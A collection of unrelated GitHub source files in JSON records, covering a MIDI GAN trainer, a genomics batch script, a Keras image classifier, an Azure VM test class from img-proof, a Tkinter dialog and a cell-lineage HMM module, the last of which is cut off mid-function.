Image\n\nfrom config import *\nfrom model import Generator, Discriminator, train\nfrom loader import POPDataset, BarDataset, parse_data\nfrom util import *\n\n###########################################################\n# Model Run\n###########################################################\ndef main():\n    # Setup CUDA device\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n    has_gpu = torch.cuda.is_available()\n\n    # Training hyper parameters\n    lr = 2e-4\n    lr_scale_g = 0.25\n    betas = (0.5, 0.99)\n    epochs = 20\n    nz = 30\n    is_chord = False\n    chord_dims = (13,1)\n\n    # Load data\n    #train_dataset = POPDataset(\"encodings.npz\")\n    train_data = parse_data(\"../dataset\")\n    train_dataset = BarDataset(train_data)\n\n    train_loader = DataLoader(train_dataset, batch_size=N_BATCH, shuffle=False,\n                              num_workers=0, drop_last=True)\n\n    # Model instantiation\n    torch.cuda.empty_cache()\n    modelG = Generator(nz=nz, is_chord=is_chord, chord_dims=chord_dims)\n    modelD = Discriminator(is_chord=is_chord, chord_dims=chord_dims)\n    modelG.to(device)\n    modelD.to(device)\n\n    # Model optimizers\n    optG = torch.optim.Adam(modelG.parameters(), lr=lr, betas=betas)\n    optD = torch.optim.Adam(modelD.parameters(), lr=lr*lr_scale_g, betas=betas)\n\n    # Model Criterion\n    criterion = nn.BCELoss()\n\n    # Model Train\n    training_run = train(model=(modelG, modelD), 
train_loader=train_loader,\n opt=(optG, optD), criterion=criterion, nz=nz,\n device=device, is_chord=is_chord, epochs=epochs)\n\n plot_loss(*extract_loss(training_run))\n\nif __name__ == '__main__':\n main()\n","repo_name":"janyanti/MidiNetGan","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22950441063","text":"#!/bin/bash\nimport os\nimport sys\n\n\n\n#rate = [(0.29, 0.39), (0.30, 0.40), (0.31, 0.41)]\nrate = [(0.37, 0.47), (0.4, 0.5)]\n\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.system(\"mkdir \" + filename) \n os.chdir(filename)\n command1 = \"nohup python3 /home/yulin/liyanbo/script/HaploDivide/version2/main.py ../chr1.sorted.bam /home/yanbo/bio/Project/Guofei/reference/GRCh37_hg19/first_1_1*.fa \" + str(i) + \" \" + str(j) + \" 0 20 > main.log &\"\n #command1 = \"nohup sh ../../check.sh 20 >check.log &\"\n os.system(command1)\n os.chdir(\"../\")\n\n'''\nprint \"\\n\"\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.chdir(filename)\n os.system(\"tail -1 snp_result\")\n os.chdir(\"../\")\n\nprint \"\\n\"\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.chdir(filename)\n os.system(\"tail -1 delete_filter.log\")\n os.chdir(\"../\")\n\nprint \"\\n\"\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.chdir(filename)\n os.system(\"tail -1 delete_nofilter.log\")\n os.chdir(\"../\")\n\nprint \"\\n\"\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.chdir(filename)\n os.system(\"tail -1 insert_filter.log\")\n os.chdir(\"../\")\n\n\nprint \"\\n\"\nfor (i,j) in rate:\n filename = str(i) + \"_\" + str(j)\n os.chdir(filename)\n os.system(\"tail -1 insert_nofilter.log\")\n os.chdir(\"../\")\n'''\n","repo_name":"yanboANU/HaploDivide","sub_path":"script/step3.py","file_name":"step3.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41720542825","text":"import numpy as np\nfrom keras.models import load_model\nimport tensorflow as tf\nfrom PIL import Image\nimport keras_cv\n\n\ndef load_image(filename):\n img = tf.keras.utils.load_img(filename, target_size=(32, 32))\n img = tf.keras.utils.img_to_array(img)\n img = img.reshape(32, 32, 3)\n return img\n\n\ndef image_classify(filename, model):\n classes = [\"Airplane\", \"Automobile\", \"Bird\", \"Cat\", \"Deer\", \"Dog\", \"Frog\", \"Horse\", \"Ship\", \"Truck\"]\n img = load_image(filename)\n model = load_model(model)\n result = model.predict(np.expand_dims(img, axis=0))\n prediction = result[0]\n result = np.argmax(prediction)\n if prediction[result] < 0.85:\n return [\"Invalid photo\"]\n else:\n return [classes[result], float(str(prediction[result])[:4])]\n ","repo_name":"smilecool2012/GoIT_Data_Science_Project","sub_path":"fileuploader/keras_model.py","file_name":"keras_model.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29577396042","text":"import os\n\nfrom azure.identity import ClientSecretCredential\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.mgmt.network import NetworkManagementClient\nfrom azure.mgmt.compute import ComputeManagementClient\n\nfrom img_proof import ipa_utils\nfrom img_proof.ipa_constants import AZURE_DEFAULT_TYPE, AZURE_DEFAULT_USER\nfrom img_proof.ipa_exceptions import 
AzureCloudException\nfrom img_proof.ipa_cloud import IpaCloud\nfrom img_proof.azure_creds_wrapper import CredentialWrapper\n\n\nclass AzureCloud(IpaCloud):\n \"\"\"Class for testing instances in Azure.\"\"\"\n cloud = 'azure'\n\n def post_init(self):\n \"\"\"Initialize Azure cloud framework class.\"\"\"\n\n self.vnet_name = (\n self.custom_args.get('vnet_name')\n or self.ipa_config['vnet_name']\n )\n self.vnet_resource_group = (\n self.custom_args.get('vnet_resource_group')\n or self.ipa_config['vnet_resource_group']\n )\n\n subnet_args = [\n self.subnet_id, self.vnet_name, self.vnet_resource_group\n ]\n if any(subnet_args) and not all(subnet_args):\n raise AzureCloudException(\n 'subnet_id, vnet_resource_group and vnet_name'\n ' are all required to use an existing subnet.'\n )\n\n if not self.region:\n raise AzureCloudException(\n 'Region is required to connect to Azure.'\n )\n\n self.service_account_file = (\n self.custom_args.get('service_account_file')\n or self.ipa_config['service_account_file']\n )\n if not self.service_account_file:\n raise AzureCloudException(\n 'Service account file is required to connect to Azure.'\n )\n else:\n self.service_account_file = os.path.expanduser(\n self.service_account_file\n )\n\n if not self.ssh_private_key_file:\n raise AzureCloudException(\n 'SSH private key file is required to connect to instance.'\n )\n\n self.accelerated_networking = (\n self.custom_args.get('accelerated_networking')\n or self.ipa_config['accelerated_networking']\n )\n self.ssh_user = self.ssh_user or AZURE_DEFAULT_USER\n self.ssh_public_key = self._get_ssh_public_key()\n\n self.gallery_name = self.custom_args.get('gallery_name')\n self.gallery_resource_group = self.custom_args.get(\n 'gallery_resource_group'\n )\n self.image_version = self.custom_args.get('image_version')\n\n gallery_args = [\n self.gallery_name,\n self.gallery_resource_group,\n self.image_version\n ]\n if any(gallery_args) and not all(gallery_args):\n raise AzureCloudException(\n 'gallery_name, gallery_resource_group and image_version'\n ' are all required to use a gallery image.'\n )\n\n self.compute = self._get_management_client(ComputeManagementClient)\n self.network = self._get_management_client(\n NetworkManagementClient,\n wrap_creds=False\n )\n self.resource = self._get_management_client(ResourceManagementClient)\n\n if self.running_instance_id:\n self._set_default_resource_names()\n\n self.image_publisher = None\n self.image_offer = None\n self.image_sku = None\n\n def _create_network_interface(\n self, ip_config_name, nic_name, public_ip, region,\n resource_group_name, subnet, accelerated_networking=False\n ):\n \"\"\"\n Create a network interface in the resource group.\n\n Attach NIC to the subnet and public IP provided.\n \"\"\"\n nic_config = {\n 'location': region,\n 'ip_configurations': [{\n 'name': ip_config_name,\n 'private_ip_allocation_method': 'Dynamic',\n 'subnet': {\n 'id': subnet.id\n },\n 'public_ip_address': {\n 'id': public_ip.id\n },\n }]\n }\n\n if accelerated_networking:\n nic_config['enable_accelerated_networking'] = True\n\n try:\n nic_setup = self.network.network_interfaces.begin_create_or_update(\n resource_group_name, nic_name, nic_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create network interface: {0}.'.format(\n error\n )\n )\n\n return nic_setup.result()\n\n def _create_public_ip(self, public_ip_name, resource_group_name, region):\n \"\"\"\n Create dynamic public IP address in the resource group.\n \"\"\"\n public_ip_config = {\n 
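# The allocation method below is 'Dynamic': Azure assigns the address once the\n            # VM starts, and _set_instance_ip later reads the assigned address back.\n            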
'location': region,\n 'public_ip_allocation_method': 'Dynamic'\n }\n\n try:\n public_ip_setup = \\\n self.network.public_ip_addresses.begin_create_or_update(\n resource_group_name, public_ip_name, public_ip_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create public IP: {0}.'.format(error)\n )\n\n return public_ip_setup.result()\n\n def _create_resource_group(self, region, resource_group_name):\n \"\"\"\n Create resource group if it does not exist.\n \"\"\"\n resource_group_config = {'location': region}\n\n try:\n self.resource.resource_groups.create_or_update(\n resource_group_name, resource_group_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create resource group: {0}.'.format(error)\n )\n\n def _create_storage_profile(self):\n \"\"\"\n Create the storage profile for the instance.\n\n Image reference can be a custom image name or a published urn.\n \"\"\"\n if self.image_publisher:\n storage_profile = {\n 'image_reference': {\n 'publisher': self.image_publisher,\n 'offer': self.image_offer,\n 'sku': self.image_sku,\n 'version': self.image_version\n },\n 'os_disk': {\n 'disk_size_gb': self.root_disk_size,\n 'create_option': 'FromImage'\n }\n }\n elif self.gallery_name:\n try:\n image = self.compute.gallery_image_versions.get(\n self.gallery_resource_group,\n self.gallery_name,\n self.image_id,\n self.image_version\n )\n image_id = image.id\n except Exception:\n raise AzureCloudException(\n 'Image with name: {0} and version: {1} '\n 'not found in gallery: {2} with resource group: '\n '{3}.'.format(\n self.image_id,\n self.image_version,\n self.gallery_name,\n self.gallery_resource_group\n )\n )\n\n storage_profile = {\n 'image_reference': {\n 'id': image_id\n }\n }\n else:\n for image in self.compute.images.list():\n if image.name == self.image_id:\n image_id = image.id\n break\n else:\n raise AzureCloudException(\n 'Image with name {0} not found.'.format(self.image_id)\n )\n\n storage_profile = {\n 'image_reference': {\n 'id': image_id\n }\n }\n\n return storage_profile\n\n def _create_subnet(self, resource_group_name, subnet_id, vnet_name):\n \"\"\"\n Create a subnet in the provided vnet and resource group.\n \"\"\"\n subnet_config = {'address_prefix': '10.0.0.0/29'}\n\n try:\n subnet_setup = self.network.subnets.begin_create_or_update(\n resource_group_name, vnet_name, subnet_id, subnet_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create subnet: {0}.'.format(error)\n )\n\n return subnet_setup.result()\n\n def _create_virtual_network(self, region, resource_group_name, vnet_name):\n \"\"\"\n Create a vnet in the given resource group with default address space.\n \"\"\"\n vnet_config = {\n 'location': region,\n 'address_space': {\n 'address_prefixes': ['10.0.0.0/27']\n }\n }\n\n try:\n vnet_setup = self.network.virtual_networks.begin_create_or_update(\n resource_group_name, vnet_name, vnet_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create vnet: {0}.'.format(error)\n )\n\n vnet_setup.result()\n\n def _create_vm(self, vm_config):\n \"\"\"\n Attempt to create or update VM instance based on vm_parameters config.\n \"\"\"\n try:\n vm_setup = self.compute.virtual_machines.begin_create_or_update(\n self.running_instance_id, self.running_instance_id,\n vm_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'An exception occurred creating virtual machine: {0}'.format(\n error\n )\n )\n\n vm_setup.result()\n\n def 
_create_vm_config(self, interface):\n \"\"\"\n Create the VM config dictionary.\n\n Requires an existing network interface object.\n \"\"\"\n # Split image ID into it's components.\n self._process_image_id()\n\n hardware_profile = {\n 'vm_size': self.instance_type or AZURE_DEFAULT_TYPE\n }\n\n network_profile = {\n 'network_interfaces': [{\n 'id': interface.id,\n 'primary': True\n }]\n }\n\n storage_profile = self._create_storage_profile()\n\n os_profile = {\n 'computer_name': self.running_instance_id,\n 'admin_username': self.ssh_user,\n 'linux_configuration': {\n 'disable_password_authentication': True,\n 'ssh': {\n 'public_keys': [{\n 'path': '/home/{0}/.ssh/authorized_keys'.format(\n self.ssh_user\n ),\n 'key_data': self.ssh_public_key\n }]\n }\n }\n }\n\n vm_config = {\n 'location': self.region,\n 'os_profile': os_profile,\n 'hardware_profile': hardware_profile,\n 'storage_profile': storage_profile,\n 'network_profile': network_profile\n }\n\n return vm_config\n\n def _get_instance(self):\n \"\"\"\n Return the instance matching the running_instance_id.\n \"\"\"\n try:\n instance = self.compute.virtual_machines.get(\n self.running_instance_id, self.running_instance_id,\n expand='instanceView'\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to retrieve instance: {0}'.format(error)\n )\n\n return instance\n\n def _get_instance_state(self):\n \"\"\"\n Retrieve state of instance.\n \"\"\"\n instance = self._get_instance()\n statuses = instance.instance_view.statuses\n\n for status in statuses:\n if status.code.startswith('PowerState'):\n return status.display_status\n\n def _get_client_from_json(self, client, credentials, wrap_creds=True):\n credential = self._get_secret_credential(credentials)\n\n if wrap_creds:\n credential = CredentialWrapper(credential)\n\n return client(\n credential,\n credentials['subscriptionId']\n )\n\n @staticmethod\n def _get_secret_credential(credentials):\n return ClientSecretCredential(\n tenant_id=credentials['tenantId'],\n client_id=credentials['clientId'],\n client_secret=credentials['clientSecret']\n )\n\n def _get_management_client(self, client_class, wrap_creds=True):\n \"\"\"\n Return instance of resource management client.\n \"\"\"\n credentials = ipa_utils.load_json(self.service_account_file)\n\n try:\n client = self._get_client_from_json(\n client_class,\n credentials,\n wrap_creds=wrap_creds\n )\n except ValueError as error:\n raise AzureCloudException(\n 'Service account file format is invalid: {0}.'.format(error)\n )\n except KeyError as error:\n raise AzureCloudException(\n 'Service account file missing key: {0}.'.format(error)\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create resource management client: '\n '{0}.'.format(error)\n )\n\n return client\n\n def _get_ssh_public_key(self):\n \"\"\"\n Generate SSH public key from private key.\n \"\"\"\n key = ipa_utils.get_public_ssh_key(self.ssh_private_key_file)\n return key.decode()\n\n def _is_instance_running(self):\n \"\"\"\n Return True if instance is in running state.\n \"\"\"\n return self._get_instance_state() == 'VM running'\n\n def _launch_instance(self):\n \"\"\"\n Create new test instance in a resource group with the same name.\n \"\"\"\n self.running_instance_id = self._generate_instance_name()\n self.logger.debug('ID of instance: %s' % self.running_instance_id)\n self._set_default_resource_names()\n\n try:\n # Try block acts as a transaction. 
If an exception is raised\n # attempt to cleanup the resource group and all created resources.\n\n # Create resource group.\n self._create_resource_group(self.region, self.running_instance_id)\n\n if self.subnet_id:\n # Use existing vnet/subnet.\n subnet = self.network.subnets.get(\n self.vnet_resource_group, self.vnet_name, self.subnet_id\n )\n else:\n self.subnet_id = ''.join([self.running_instance_id, '-subnet'])\n self.vnet_name = ''.join([self.running_instance_id, '-vnet'])\n\n # Create new vnet\n self._create_virtual_network(\n self.region, self.running_instance_id, self.vnet_name\n )\n\n # Create new subnet in new vnet\n subnet = self._create_subnet(\n self.running_instance_id, self.subnet_id, self.vnet_name\n )\n\n # Setup interface and public ip in resource group.\n public_ip = self._create_public_ip(\n self.public_ip_name, self.running_instance_id, self.region\n )\n interface = self._create_network_interface(\n self.ip_config_name, self.nic_name, public_ip, self.region,\n self.running_instance_id, subnet, self.accelerated_networking\n )\n\n # Get dictionary of VM parameters and create instance.\n vm_config = self._create_vm_config(interface)\n self._create_vm(vm_config)\n except Exception:\n try:\n self._terminate_instance()\n except Exception:\n pass\n raise\n else:\n # Ensure VM is in the running state.\n self._wait_on_instance('VM running', timeout=self.timeout)\n\n def _process_image_id(self):\n \"\"\"\n Split image id into component values.\n\n Example: SUSE:SLES:12-SP3:2018.01.04\n Publisher:Offer:Sku:Version\n\n Raises:\n If image_id is not a valid format.\n \"\"\"\n image_info = self.image_id.strip().split(':')\n\n if len(image_info) == 4:\n # Split out image attrs if in URN format\n self.image_publisher = image_info[0]\n self.image_offer = image_info[1]\n self.image_sku = image_info[2]\n self.image_version = image_info[3]\n\n def _set_default_resource_names(self):\n \"\"\"\n Generate names for resources based on the running_instance_id.\n \"\"\"\n self.ip_config_name = ''.join([\n self.running_instance_id, '-ip-config'\n ])\n self.nic_name = ''.join([self.running_instance_id, '-nic'])\n self.public_ip_name = ''.join([self.running_instance_id, '-public-ip'])\n\n def _set_image_id(self):\n \"\"\"\n If an existing instance is used get image id from deployment.\n \"\"\"\n instance = self._get_instance()\n image_info = instance.storage_profile.image_reference\n\n if image_info.publisher:\n self.image_id = ':'.join([\n image_info.publisher, image_info.offer,\n image_info.sku, image_info.version\n ])\n else:\n if 'galleries' in image_info.id:\n # /subscriptions/{id}/resourceGroups/{rg_name}\n # /providers/Microsoft.Compute/galleries/{gallery_name}\n # /images/{image_definition_name}/versions/{version}\n data = image_info.id.split('/')\n self.image_version = data[-1]\n self.image_id = data[-3]\n self.gallery_name = data[-5]\n self.gallery_resource_group = data[-9]\n else:\n self.image_id = image_info.id.rsplit('/', maxsplit=1)[1]\n\n def _set_instance_ip(self):\n \"\"\"\n Get the IP address based on instance ID.\n\n If public IP address not found attempt to get private IP.\n \"\"\"\n try:\n ip_address = self.network.public_ip_addresses.get(\n self.running_instance_id, self.public_ip_name\n ).ip_address\n except Exception:\n try:\n ip_address = self.network.network_interfaces.get(\n self.running_instance_id, self.nic_name\n ).ip_configurations[0].private_ip_address\n except Exception as error:\n raise AzureCloudException(\n 'Unable to retrieve instance IP address: {0}.'.format(\n 
error\n                    )\n                )\n\n        self.instance_ip = ip_address\n\n    def _start_instance(self):\n        \"\"\"\n        Start the instance.\n        \"\"\"\n        try:\n            vm_start = self.compute.virtual_machines.begin_start(\n                self.running_instance_id, self.running_instance_id\n            )\n        except Exception as error:\n            raise AzureCloudException(\n                'Unable to start instance: {0}.'.format(error)\n            )\n\n        vm_start.result()\n\n    def _stop_instance(self):\n        \"\"\"\n        Stop the instance.\n        \"\"\"\n        try:\n            vm_stop = self.compute.virtual_machines.begin_power_off(\n                self.running_instance_id, self.running_instance_id\n            )\n        except Exception as error:\n            raise AzureCloudException(\n                'Unable to stop instance: {0}.'.format(error)\n            )\n\n        vm_stop.result()\n\n    def _terminate_instance(self):\n        \"\"\"\n        Terminate the resource group and instance.\n        \"\"\"\n        try:\n            if hasattr(self.resource.resource_groups, 'delete'):\n                self.resource.resource_groups.delete(\n                    self.running_instance_id\n                )\n            else:\n                self.resource.resource_groups.begin_delete(\n                    self.running_instance_id\n                )\n        except Exception as error:\n            raise AzureCloudException(\n                'Unable to terminate resource group: {0}.'.format(error)\n            )\n\n    def get_console_log(self):\n        \"\"\"\n        Return console log output if it is available.\n\n        Currently there is no way to get the console log from the API.\n        \"\"\"\n        return ''\n","repo_name":"SUSE-Enceladus/img-proof","sub_path":"img_proof/ipa_azure.py","file_name":"ipa_azure.py","file_ext":"py","file_size_in_byte":20561,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"14947672273","text":"# -*- coding: utf-8 -*-\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import Frame, Label\n\nfrom util.widgets.Dialog import *\n\nfrom .AfficherMasquerClass import *\n\ndef askAfficherMasquer(periodManager):\n    \"\"\"\n    Dialog for managing the visibility of schedulables.\n    @param periodManager: the app's period manager\n    @return masquage: True if at least one task is not visible\n    \"\"\"\n    masquage = False\n    def onClose(b):\n        nonlocal masquage\n        if b == \"Ok\":\n            masquage = gestion.onClose(b)\n        fen.destroy()\n\n    fen = Dialog(title = \"Show or hide tasks\", buttons = (\"Ok\", \"Cancel\"), command = onClose)\n    gestion = AfficherMasquer(fen, periodManager)\n    gestion.pack(fill = BOTH, expand = YES)\n\n    fen.activateandwait()\n    return masquage\n\n","repo_name":"Zetrypio/TaskManager","sub_path":"TaskManager/toolbar/dialog/askAfficherMasquerDialog.py","file_name":"askAfficherMasquerDialog.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"354153335","text":"\"\"\" This file is completely user defined. We have provided a general starting point for the user to use as an example. 
\"\"\"\nimport numpy as np\nimport scipy.stats as sp\nfrom typing import Union\n\nfrom .stateCommon import gamma_estimator, basic_censor, bern_estimator\nfrom ..CellVar import Time, CellVar\n\n\nclass StateDistribution:\n \"\"\"\n StateDistribution for cells with gamma distributed times.\n \"\"\"\n\n def __init__(self, bern_p=0.9, gamma_a=7, gamma_scale=4.5):\n \"\"\"Initialization function should take in just in the parameters\n for the observations that comprise the multivariate random variable emission they expect their data to have.\n In this case, we used Gamma distribution for cell lifetime, which has 2 parameters; shape and scale.\n And we used bernoulli distribution for cell lifetime, which has 1 parameter.\n \"\"\"\n self.params = np.array([bern_p, gamma_a, gamma_scale])\n\n def rvs(\n self, size: int, rng=None\n ): # user has to identify what the multivariate (or univariate) random variable looks like\n \"\"\"User-defined way of calculating a random variable given the parameters of the state stored in their object.\"\"\"\n # {\n rng = np.random.default_rng(rng)\n bern_obs = rng.binomial(\n 1, p=self.params[0], size=size\n ) # bernoulli observations\n gamma_obs = rng.gamma(\n self.params[1], scale=self.params[2], size=size\n ) # gamma observations\n gamma_obs_censor = [1] * size # 1 if observed\n\n # } is user-defined in that they have to define and maintain the order of the multivariate random variables.\n # These tuples of observations will go into the cells in the lineage tree.\n return bern_obs, gamma_obs, gamma_obs_censor\n\n def dist(self, other) -> float:\n \"\"\"Calculate the Wasserstein distance between two gamma distributions that each correspond to a state.\n This is our way of calculating the distance between two state, when their bernoulli distribution is kept the same.\n For more information about wasserstein distance, please see https://en.wikipedia.org/wiki/Wasserstein_metric.\n \"\"\"\n assert isinstance(self, type(other))\n dist = np.absolute(\n self.params[1] * self.params[2] - other.params[1] * other.params[2]\n )\n return dist\n\n def dof(self) -> int:\n \"\"\"Return the degrees of freedom.\n In this case, each state has 1 bernoulli distribution parameter, and 2 gamma distribution parameters.\n \"\"\"\n return 3\n\n def logpdf(self, x: np.ndarray) -> np.ndarray:\n \"\"\"User-defined way of calculating the log likelihood of the observation stored in a cell.\n In the case of a univariate observation, the user still has to define how the likelihood is calculated,\n but has the ability to just return the output of a known scipy.stats..<{pdf,pmf}> function.\n In the case of a multivariate observation, the user has to decide how the likelihood is calculated.\n In our example, we assume the observation's are uncorrelated across the dimensions (across the different\n distribution observations), so the total log likelihood of observing the multivariate observation is just the sum of\n the individual observation log likelihoods.\n \"\"\"\n ll = np.zeros(x.shape[0])\n\n # Update uncensored Gamma\n ll[x[:, 2] == 1] += sp.gamma.logpdf(\n x[x[:, 2] == 1, 1], a=self.params[1], scale=self.params[2]\n )\n\n # Update censored Gamma\n ll[x[:, 2] == 0] += sp.gamma.logsf(\n x[x[:, 2] == 0, 1], a=self.params[1], scale=self.params[2]\n )\n\n # Remove dead cells\n ll[x[:, 0] == 0] = 0.0\n\n # Update for observed Bernoulli\n ll[np.isfinite(x[:, 0])] += sp.bernoulli.logpmf(\n x[np.isfinite(x[:, 0]), 0], self.params[0]\n )\n\n # Log likelihood of negative values should be zero\n ll[x[:, 
1] < 0] = 0.0\n ll[x[:, 0] < 0] = 0.0\n\n return ll\n\n def estimator(self, X: list, gammas: np.ndarray):\n \"\"\"User-defined way of estimating the parameters given a list of the tuples of observations from a group of cells.\"\"\"\n\n # getting the observations as individual lists\n # {\n x = np.array(X)\n bern_obs = x[:, 0]\n γ_obs = x[:, 1]\n gamma_obs_censor = x[:, 2]\n\n # remove negative observations from fitting\n bern_obs_ = bern_obs[γ_obs >= 0]\n γ_obs_ = γ_obs[γ_obs >= 0]\n gamma_obs_censor_ = gamma_obs_censor[γ_obs >= 0]\n gammas_ = gammas[γ_obs >= 0]\n\n # Both unoberved and dead cells should be removed from gamma\n g_mask = np.logical_and(np.isfinite(γ_obs_), bern_obs_.astype(\"bool\"))\n assert (\n np.sum(g_mask) > 0\n ), f\"All the cells are eliminated from the Gamma estimator.\"\n\n self.params[0] = bern_estimator(bern_obs, gammas)\n self.params[1], self.params[2] = gamma_estimator(\n [γ_obs_[g_mask]],\n [gamma_obs_censor_[g_mask]],\n [gammas_[g_mask]],\n self.params[1:3],\n phase=\"all\",\n )\n\n # } requires the user's attention.\n # Note that we return an instance of the state distribution class, but now instantiated with the parameters\n # from estimation. This is then stored in the original state distribution object which then gets updated\n # if this function runs again.\n\n def assign_times(self, full_lineage: list[CellVar]):\n \"\"\"\n Assigns the start and end time for each cell in the lineage.\n The time observation will be stored in the cell's observation parameter list\n in the second position (index 1). See the other time functions to understand.\n This is used in the creation of LineageTrees.\n \"\"\"\n # traversing the cells by generation\n for cell in full_lineage:\n if cell.isRootParent():\n cell.time = Time(0, cell.obs[1])\n else:\n cell.time = Time(\n cell.parent.time.endT, cell.parent.time.endT + cell.obs[1]\n )\n\n def censor_lineage(\n self,\n censor_condition: int,\n full_lineage: list[CellVar],\n desired_experiment_time=2e12,\n ):\n \"\"\"\n This function removes those cells that are intended to be removed.\n These cells include the descendants of a cell that has died, or has lived beyonf the experimental end time.\n It takes in LineageTree object, walks through all the cells in the output binary tree,\n applies the censorship to each cell that is supposed to be removed,\n and returns the lineage of cells that are supposed to be alive and accounted for.\n \"\"\"\n if censor_condition == 0:\n return full_lineage\n\n for cell in full_lineage:\n basic_censor(cell)\n\n if censor_condition in (1, 3):\n fate_censor(cell)\n\n if censor_condition in (2, 3):\n time_censor(cell, desired_experiment_time)\n\n return [c for c in full_lineage if c.observed]\n\n\ndef fate_censor(cell):\n \"\"\"\n Checks whether a cell has died based on its fate, and if so, it will remove its subtree.\n Our example is based on the standard requirement that the first observation\n (index 0) is a measure of the cell's fate (1 being alive, 0 being dead).\n \"\"\"\n if cell.obs[0] == 0:\n if not cell.isLeafBecauseTerminal():\n cell.left.observed = False\n cell.right.observed = False\n\n\ndef time_censor(cell, desired_experiment_time: Union[int, float]):\n \"\"\"\n Checks whether a cell has lived beyond the experiment end time and if so, it will remove its subtree.\n Our example is based on the standard requirement that the second observation\n (index 1) is a measure of the cell's lifetime.\n \"\"\"\n if cell.time.endT > desired_experiment_time:\n cell.time.endT = 
desired_experiment_time\n cell.obs[0] = float(\"nan\")\n cell.obs[1] = desired_experiment_time - cell.time.startT\n cell.obs[2] = 0 # censored\n if not cell.isLeafBecauseTerminal():\n # the daughters are no longer observed\n cell.left.observed = False\n cell.right.observed = False\n\n\ndef atonce_estimator(\n all_tHMMobj: list, x_list: list, gammas_list: list, phase: str, state_j: int\n):\n \"\"\"Estimating the parameters for one state, in this case Bernoulli and gamma distribution parameters,\n given a list of the tuples of observations from a group of cells.\n gammas_list is only for one state.\"\"\"\n # unzipping the list of tuples\n x_data = [np.array(x) for x in x_list]\n\n # getting the observations as individual lists\n bern_obs = [x[:, 0] for x in x_data]\n γ_obs = [x[:, 1] for x in x_data]\n gamma_obs_censor = [x[:, 2] for x in x_data]\n\n # remove negative observations from being used for fitting\n bern_obs_ = [b[γ_obs[i] >= 0] for i, b in enumerate(bern_obs)]\n γ_obs_ = [g[g >= 0] for i, g in enumerate(γ_obs)]\n gamma_obs_censor_ = [gc[γ_obs[i] >= 0] for i, gc in enumerate(gamma_obs_censor)]\n gammas_list_ = [gc[γ_obs[i] >= 0] for i, gc in enumerate(gammas_list)]\n\n for i, item in enumerate(bern_obs_):\n assert item.shape == γ_obs_[i].shape == gamma_obs_censor_[i].shape\n\n bern_params = [\n bern_estimator(bern_obs_[i], gammas_list_[i]) for i in range(len(gammas_list_))\n ]\n\n # Both unobserved and dead cells should be removed from gamma\n g_masks = [\n np.logical_and(np.isfinite(γ_o), berns.astype(\"bool\"))\n for γ_o, berns in zip(γ_obs_, bern_obs_)\n ]\n for g_mask in g_masks:\n assert (\n np.sum(g_mask) > 0\n ), \"All the cells are eliminated from the Gamma estimator.\"\n\n γ_obs_total = [g_obs[g_masks[i]] for i, g_obs in enumerate(γ_obs_)]\n γ_obs_total_censored = [\n g_obs_cen[g_masks[i]] for i, g_obs_cen in enumerate(gamma_obs_censor_)\n ]\n gammas_total = [\n np.vstack(gamma_tot)[g_masks[i]] for i, gamma_tot in enumerate(gammas_list_)\n ]\n gammas_total = [np.squeeze(g) for g in gammas_total]\n\n if phase == \"G1\":\n x0 = np.array(\n [all_tHMMobj[0].estimate.E[state_j].params[2]]\n + [tHMMobj.estimate.E[state_j].params[3] for tHMMobj in all_tHMMobj]\n )\n output = gamma_estimator(\n γ_obs_total, γ_obs_total_censored, gammas_total, x0, phase=phase\n )\n for i, tHMMobj in enumerate(all_tHMMobj):\n tHMMobj.estimate.E[state_j].params[0] = bern_params[i]\n tHMMobj.estimate.E[state_j].G1.params[0] = bern_params[i]\n tHMMobj.estimate.E[state_j].params[2] = output[0]\n tHMMobj.estimate.E[state_j].G1.params[1] = output[0]\n tHMMobj.estimate.E[state_j].params[3] = output[i + 1]\n tHMMobj.estimate.E[state_j].G1.params[2] = output[i + 1]\n\n elif phase == \"G2\":\n x0 = np.array(\n [all_tHMMobj[0].estimate.E[state_j].params[4]]\n + [tHMMobj.estimate.E[state_j].params[5] for tHMMobj in all_tHMMobj]\n )\n output = gamma_estimator(\n γ_obs_total, γ_obs_total_censored, gammas_total, x0, phase=phase\n )\n for i, tHMMobj in enumerate(all_tHMMobj):\n tHMMobj.estimate.E[state_j].params[1] = bern_params[i]\n tHMMobj.estimate.E[state_j].G2.params[0] = bern_params[i]\n tHMMobj.estimate.E[state_j].params[4] = output[0]\n tHMMobj.estimate.E[state_j].G2.params[1] = output[0]\n tHMMobj.estimate.E[state_j].params[5] = output[i + 1]\n tHMMobj.estimate.E[state_j].G2.params[2] = output[i + 1]\n\n elif phase == \"all\":\n x0 = np.array(\n [all_tHMMobj[0].estimate.E[state_j].params[1]]\n + [tHMMobj.estimate.E[state_j].params[2] for tHMMobj in all_tHMMobj]\n )\n output = gamma_estimator(\n 
